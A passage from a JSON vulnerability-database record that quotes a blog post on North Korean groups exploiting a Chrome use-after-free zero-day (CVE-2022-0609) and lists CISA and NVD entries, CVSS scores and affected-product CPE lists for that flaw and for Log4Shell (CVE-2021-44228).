[exploiting](<https://arstechnica.com/information-technology/2022/03/north-korean-hackers-unleashed-chrome-0-day-exploit-on-hundreds-of-us-targets/>) a zero-day in Chrome.\n\n> The flaw, tracked as CVE-2022-0609, was exploited by two separate North Korean hacking groups. Both groups deployed the same exploit kit on websites that either belonged to legitimate organizations and were hacked or were set up for the express purpose of serving attack code on unsuspecting visitors. One group was dubbed Operation Dream Job, and it targeted more than 250 people working for 10 different companies. The other group, known as AppleJeus, targeted 85 users.\n\n[Details](<https://blog.google/threat-analysis-group/countering-threats-north-korea/>):\n\n> The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users. The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.\n> \n> The kit initially serves some heavily obfuscated javascript used to fingerprint the target system. This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server. If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript. If the RCE was successful, the javascript would request the next stage referenced within the script as &quot;SBX&quot;, a common acronym for Sandbox Escape. We unfortunately were unable to recover any of the stages that followed the initial RCE.\n> \n> Careful to protect their exploits, the attackers deployed multiple safeguards to make it difficult for security teams to recover any of the stages. These safeguards included:\n> \n> * Only serving the iframe at specific times, presumably when they knew an intended target would be visiting the site. \n> * On some email campaigns the targets received links with unique IDs. This was potentially used to enforce a one-time-click policy for each link and allow the exploit kit to only be served once. \n> * The exploit kit would AES encrypt each stage, including the clients&#x27; responses with a session-specific key. \n> * Additional stages were not served if the previous stage failed.\n> \n> Although we recovered a Chrome RCE, we also found evidence where the attackers specifically checked for visitors using Safari on MacOS or Firefox (on any OS), and directed them to specific links on known exploitation servers. We did not recover any responses from those URLs.\n\nIf you&#x27;re a Chrome user, patch your system now.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T11:13:50", "type": "schneier", "title": "Chrome Zero-Day from North Korea", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-03-30T14:37:31", "id": "SCHNEIER:A04F4786905DA91D85C88E72BCD1F5E6", "href": "https://www.schneier.com/blog/archives/2022/03/chrome-zero-day-from-north-korea.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-12-06T16:20:37", "description": "The vulnerability exists due to a use-after-free error within the Animation component in Google Chrome.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-15T00:00:00", "type": "cisa_kev", "title": "Google Chrome Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-15T00:00:00", "id": "CISA-KEV-CVE-2022-0609", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:20:37", "description": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa_kev", "title": "Apache Log4j2 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T00:00:00", "id": "CISA-KEV-CVE-2021-44228", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-06T14:43:17", "description": "Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-05T00:15:00", "type": "cve", "title": "CVE-2022-0609", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-04-08T17:14:00", "cpe": [], "id": "CVE-2022-0609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0609", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-06T16:08:51", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T10:15:00", "type": "cve", "title": "CVE-2021-44228", "cwe": ["CWE-400", "CWE-20", "CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-07T03:39:00", "cpe": ["cpe:/a:cisco:wan_automation_engine:7.5", "cpe:/a:cisco:crosswork_data_gateway:3.0.0", "cpe:/a:cisco:unified_sip_proxy:010.000\\(000\\)", "cpe:/a:cisco:paging_server:14.0\\(1\\)", "cpe:/a:cisco:video_surveillance_manager:7.14\\(3.025\\)", "cpe:/a:siemens:energy_engage:3.1", "cpe:/a:siemens:desigo_cc_advanced_reports:4.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.001\\)", "cpe:/a:cisco:enterprise_chat_and_email:12.5\\(1\\)", "cpe:/a:siemens:mendix:*", "cpe:/a:cisco:unified_contact_center_management_portal:12.6\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1h\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:2.3.2.0", "cpe:/a:cisco:evolved_programmable_network_manager:5.1", "cpe:/a:cisco:wan_automation_engine:7.2.3", "cpe:/a:cisco:firepower_threat_defense:7.0.0", "cpe:/a:siemens:captial:2019.1", "cpe:/a:cisco:identity_services_engine:002.007\\(000.356\\)", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:intel:computer_vision_annotation_tool:-", "cpe:/a:cisco:identity_services_engine:003.001\\(000.518\\)", "cpe:/a:siemens:desigo_cc_info_center:5.1", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000", "cpe:/a:cisco:unified_contact_center_enterprise:12.0\\(1\\)", "cpe:/a:cisco:identity_services_engine:2.4.0", "cpe:/a:cisco:wan_automation_engine:7.2.1", "cpe:/a:cisco:smart_phy:3.1.4", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:cisco:webex_meetings_server:3.0", "cpe:/a:cisco:paging_server:8.4\\(1\\)", "cpe:/a:cisco:optical_network_controller:1.1", "cpe:/a:cisco:firepower_threat_defense:6.6.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.000\\)", "cpe:/a:cisco:fog_director:-", "cpe:/a:cisco:webex_meetings_server:4.0", "cpe:/a:netapp:active_iq_unified_manager:-", "cpe:/a:intel:genomics_kernel_library:-", "cpe:/a:siemens:logo\\!_soft_comfort:*", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)", "cpe:/a:cisco:firepower_threat_defense:7.1.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.000", "cpe:/o:cisco:fxos:7.1.0", "cpe:/a:cisco:dna_spaces_connector:-", "cpe:/a:cisco:sd-wan_vmanage:20.6", "cpe:/a:cisco:smart_phy:3.2.1", "cpe:/a:netapp:cloud_secure_agent:-", "cpe:/a:cisco:packaged_contact_center_enterprise:11.6\\(1\\)", "cpe:/a:cisco:iot_operations_dashboard:-", "cpe:/a:cisco:virtual_topology_system:2.6.6", "cpe:/a:siemens:teamcenter:*", "cpe:/a:cisco:network_dashboard_fabric_controller:11.1\\(1\\)", "cpe:/a:cisco:wan_automation_engine:7.6", "cpe:/a:cisco:mobility_services_engine:-", "cpe:/a:cisco:emergency_responder:11.5\\(4.66000.14\\)", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:7.3", "cpe:/a:siemens:comos:*", "cpe:/a:siemens:siveillance_identity:1.5", "cpe:/a:cisco:unified_sip_proxy:010.000\\(001\\)", "cpe:/a:cisco:unified_workforce_optimization:11.5\\(1\\)", "cpe:/a:cisco:network_dashboard_fabric_controller:11.2\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1a\\)", "cpe:/a:cisco:crosswork_platform_infrastructure:4.1.0", "cpe:/a:siemens:sipass_integrated:2.85", "cpe:/a:cisco:unity_connection:11.5", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\)", "cpe:/a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\)", "cpe:/a:cisco:unified_sip_proxy:010.002\\(000\\)", "cpe:/a:cisco:broadworks:-", "cpe:/a:cisco:sd-wan_vmanage:20.4", "cpe:/a:cisco:wan_automation_engine:7.3", "cpe:/a:cisco:firepower_threat_defense:6.7.0", "cpe:/a:cisco:unified_customer_voice_portal:11.6", "cpe:/a:siemens:xpedition_enterprise:-", "cpe:/a:siemens:siveillance_vantage:*", "cpe:/a:cisco:evolved_programmable_network_manager:4.1.1", "cpe:/a:cisco:network_insights_for_data_center:6.0\\(2.1914\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1l\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\)", "cpe:/a:cisco:crosswork_network_automation:2.0.0", "cpe:/a:siemens:desigo_cc_advanced_reports:4.2", "cpe:/a:cisco:unified_customer_voice_portal:12.5", "cpe:/a:cisco:firepower_threat_defense:6.2.3", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1k\\)", "cpe:/a:cisco:automated_subsea_tuning:02.01.00", "cpe:/a:siemens:operation_scheduler:1.1.3", "cpe:/a:cisco:emergency_responder:11.5", "cpe:/a:cisco:video_surveillance_manager:7.14\\(2.26\\)", "cpe:/a:cisco:smart_phy:3.1.5", "cpe:/a:cisco:cyber_vision:4.0.2", "cpe:/a:cisco:unified_communications_manager:11.5\\(1\\)su3", "cpe:/o:cisco:fxos:6.3.0", "cpe:/a:cisco:unified_customer_voice_portal:12.6\\(1\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18119.2\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.000\\)", "cpe:/a:cisco:network_dashboard_fabric_controller:11.4\\(1\\)", "cpe:/a:intel:system_studio:-", "cpe:/a:siemens:sipass_integrated:2.80", "cpe:/a:cisco:enterprise_chat_and_email:12.6\\(1\\)", "cpe:/a:cisco:identity_services_engine:002.004\\(000.914\\)", "cpe:/a:siemens:xpedition_package_integrator:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1g\\)", "cpe:/o:siemens:sppa-t3000_ses3000_firmware:*", "cpe:/a:siemens:energyip_prepay:3.8", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(1\\)", "cpe:/a:siemens:solid_edge_harness_design:2020", "cpe:/a:cisco:cx_cloud_agent:001.012", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.003", "cpe:/a:netapp:ontap_tools:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.001.000", "cpe:/a:cisco:unified_contact_center_express:12.6\\(2\\)", "cpe:/a:cisco:unified_customer_voice_portal:11.6\\(1\\)", "cpe:/o:cisco:fxos:7.0.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.0", "cpe:/a:cisco:common_services_platform_collector:002.010\\(000.000\\)", "cpe:/a:siemens:solid_edge_cam_pro:*", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.004.000.003", "cpe:/a:cisco:enterprise_chat_and_email:12.0\\(1\\)", "cpe:/a:siemens:sentron_powermanager:4.1", "cpe:/a:cisco:unified_customer_voice_portal:12.0\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(2\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.001.001", "cpe:/a:cisco:crosswork_network_automation:4.1.0", "cpe:/a:cisco:crosswork_network_automation:-", "cpe:/a:intel:system_debugger:-", "cpe:/a:cisco:crosswork_zero_touch_provisioning:3.0.0", "cpe:/a:siemens:head-end_system_universal_device_integration_system:*", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:siemens:desigo_cc_advanced_reports:4.1", "cpe:/a:cisco:unified_contact_center_enterprise:11.6\\(2\\)", "cpe:/a:siemens:industrial_edge_management:*", "cpe:/a:cisco:unified_sip_proxy:010.002\\(001\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1e\\)", "cpe:/a:cisco:smart_phy:3.1.3", "cpe:/a:cisco:finesse:12.5\\(1\\)", "cpe:/a:cisco:identity_services_engine:003.002\\(000.116\\)", "cpe:/a:cisco:smart_phy:3.1.2", "cpe:/a:siemens:energyip:9.0", "cpe:/a:cisco:smart_phy:21.3", "cpe:/a:siemens:desigo_cc_advanced_reports:5.1", "cpe:/a:cisco:paging_server:9.0\\(1\\)", "cpe:/a:siemens:vesys:2019.1", "cpe:/a:cisco:network_dashboard_fabric_controller:11.3\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1f\\)", "cpe:/a:cisco:evolved_programmable_network_manager:5.0", "cpe:/a:cisco:evolved_programmable_network_manager:3.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(3\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.17900.52\\)", "cpe:/a:cisco:sd-wan_vmanage:20.8", "cpe:/a:cisco:sd-wan_vmanage:20.7", "cpe:/a:cisco:cloudcenter_suite:4.10\\(0.15\\)", "cpe:/a:cisco:crosswork_network_automation:3.0.0", "cpe:/a:cisco:video_surveillance_manager:7.14\\(4.018\\)", "cpe:/a:siemens:siveillance_command:4.16.2.1", "cpe:/a:cisco:crosswork_optimization_engine:3.0.0", "cpe:/a:cisco:unified_contact_center_enterprise:12.5\\(1\\)", "cpe:/o:cisco:fxos:6.2.3", "cpe:/a:cisco:ucs_central_software:2.0\\(1c\\)", "cpe:/a:cisco:sd-wan_vmanage:20.3", "cpe:/a:cisco:firepower_threat_defense:6.4.0", "cpe:/a:cisco:firepower_threat_defense:6.3.0", "cpe:/a:cisco:crosswork_network_controller:3.0.0", "cpe:/a:cisco:unified_contact_center_express:12.5\\(1\\)", "cpe:/a:cisco:unified_customer_voice_portal:12.5\\(1\\)", "cpe:/a:cisco:firepower_threat_defense:6.5.0", "cpe:/a:siemens:siguard_dsa:4.4", "cpe:/a:intel:oneapi_sample_browser:-", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.001\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.22900.28\\)", "cpe:/a:cisco:dna_spaces:-", "cpe:/a:siemens:nx:*", "cpe:/a:cisco:unity_connection:11.5\\(1.10000.6\\)", "cpe:/a:siemens:energyip:8.6", "cpe:/a:cisco:video_surveillance_manager:7.14\\(1.26\\)", "cpe:/a:cisco:crosswork_network_automation:4.1.1", "cpe:/a:cisco:finesse:12.6\\(1\\)", "cpe:/a:cisco:identity_services_engine:002.006\\(000.156\\)", "cpe:/a:cisco:cloudcenter_suite:5.5\\(0\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.002.000", "cpe:/a:cisco:cloudcenter_suite:5.3\\(0\\)", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.18900.97\\)", "cpe:/a:cisco:sd-wan_vmanage:20.5", "cpe:/a:cisco:unified_computing_system:006.008\\(001.000\\)", "cpe:/a:cisco:intersight_virtual_appliance:1.0.9-343", "cpe:/a:cisco:paging_server:8.5\\(1\\)", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:cisco:evolved_programmable_network_manager:4.1", "cpe:/a:netapp:cloud_insights:-", "cpe:/a:siemens:siguard_dsa:4.3", "cpe:/a:intel:audio_development_kit:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.0\\(1\\)", "cpe:/a:cisco:prime_service_catalog:12.1", "cpe:/o:cisco:fxos:6.7.0", "cpe:/a:cisco:emergency_responder:11.5\\(4.65000.14\\)", "cpe:/a:cisco:data_center_network_manager:11.3\\(1\\)", "cpe:/a:cisco:paging_server:9.1\\(1\\)", "cpe:/a:cisco:dna_center:2.2.2.8", "cpe:/a:cisco:paging_server:8.3\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1d\\)", "cpe:/a:cisco:evolved_programmable_network_manager:3.1", "cpe:/a:cisco:cloudcenter_suite:5.4\\(1\\)", "cpe:/a:cisco:sd-wan_vmanage:20.6.1", "cpe:/o:cisco:fxos:6.4.0", "cpe:/a:cisco:identity_services_engine:003.000\\(000.458\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.002\\)", "cpe:/a:apache:log4j:2.0", "cpe:/a:cisco:connected_mobile_experiences:-", "cpe:/a:cisco:ucs_central_software:2.0\\(1b\\)", "cpe:/a:cisco:cyber_vision_sensor_management_extension:4.0.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(1\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(1\\)", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.002\\)", "cpe:/a:siemens:siveillance_viewpoint:*", "cpe:/o:cisco:fxos:6.5.0", "cpe:/a:cisco:unified_customer_voice_portal:12.0", "cpe:/a:siemens:energyip:8.7", "cpe:/a:cisco:paging_server:9.0\\(2\\)", "cpe:/a:cisco:network_services_orchestrator:-", "cpe:/a:siemens:sentron_powermanager:4.2", "cpe:/a:siemens:energyip_prepay:3.7", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(2\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(2\\)", "cpe:/a:cisco:cloudcenter_suite:5.5\\(1\\)", "cpe:/a:intel:sensor_solution_firmware_development_kit:-", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\)", "cpe:/a:cisco:wan_automation_engine:7.4", "cpe:/a:siemens:desigo_cc_advanced_reports:5.0", "cpe:/a:cisco:wan_automation_engine:7.2.2", "cpe:/a:siemens:siguard_dsa:4.2", "cpe:/a:cisco:wan_automation_engine:7.1.3", "cpe:/a:cisco:unified_communications_manager:11.5\\(1.21900.40\\)", "cpe:/a:percussion:rhythmyx:7.3.2", "cpe:/a:siemens:opcenter_intelligence:3.2", "cpe:/a:siemens:desigo_cc_info_center:5.0", "cpe:/a:cisco:paging_server:12.5\\(2\\)", "cpe:/a:cisco:unified_contact_center_express:12.6\\(1\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.000", "cpe:/a:siemens:siveillance_control_pro:*", "cpe:/o:cisco:fxos:6.6.0", "cpe:/a:siemens:spectrum_power_4:4.70", "cpe:/a:siemens:energyip:8.5", "cpe:/a:netapp:snapcenter:-", "cpe:/a:siemens:spectrum_power_7:2.30", "cpe:/a:siemens:siveillance_identity:1.6", "cpe:/o:debian:debian_linux:11.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.000.001", "cpe:/a:intel:secure_device_onboard:-", "cpe:/a:cisco:network_assurance_engine:6.0\\(2.1912\\)"], "id": "CVE-2021-44228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*", "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*", 